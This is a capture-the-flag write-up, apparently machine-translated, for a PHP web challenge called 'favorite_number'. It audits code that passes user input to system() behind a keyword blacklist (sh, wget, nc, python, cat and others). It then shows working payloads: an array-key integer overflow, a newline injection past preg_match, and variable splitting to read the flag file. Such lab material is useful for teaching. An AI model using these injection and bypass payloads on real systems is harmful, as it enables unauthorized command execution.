Attack and defense world web question -favorite_ number

Code audit

The source code is given directly , Conduct code audit .

<?php
//php5.5.9
$stuff = $_POST["stuff"];
$array = ['admin', 'user'];
if($stuff === $array && $stuff[0] != 'admin') {
    
    $num= $_POST["num"];
    if (preg_match("/^\d+$/im",$num)){
    
        if (!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i",$num)){
    
            echo "my favorite num is:";
            system("echo ".$num);
        }else{
    
            echo 'Bonjour!';
        }
    }
} else {
    
    highlight_file(__FILE__);
}

First post Pass in the parameter , There are two parameters passed in , One stuff, One num, First stuff It has to be with array The type and value of the array are exactly the same , however stuff[0] It can't be admin, after num It has to be numbers , And set blacklist filtering , Final output .

PHP5.5.9 Integer overflow vulnerability

stay php5.5.9 In version , When the array is nine 16 Number of hours , It will overflow , Equivalent to reordering ,16 Of 8 The power is 4294967296 Logically equivalent to subscript 0. So we can use 4294967296 Treat it as a zero subscript to bypass sutff[0]！=‘admin’.
bp Grab and replay payload：stuff[4294967296]=admin&stuff[1]=user&num=123

preg_match() Bypass

first preg_match() Bypass ,preg_match() Will not match newline , have access to %0a To bypass .payload:stuff[4294967296]=admin&stuff[1]=user&num=123%0aasd

Successfully bypassed .
View file first .

It can be executed , After searching, I found flag In the root directory

Finally, bypass the blacklist cat It is filtered and can be used tac Open up

cat： Start with the first line , And output all the content
tac： Show the contents in reverse order from the last line , And output all the content

flag You can bypass .payload：stuff[4294967296]=admin&stuff[1]=user&num=123%0aa=ag;b=fl;tac /$b$a

Succeed in getting flag.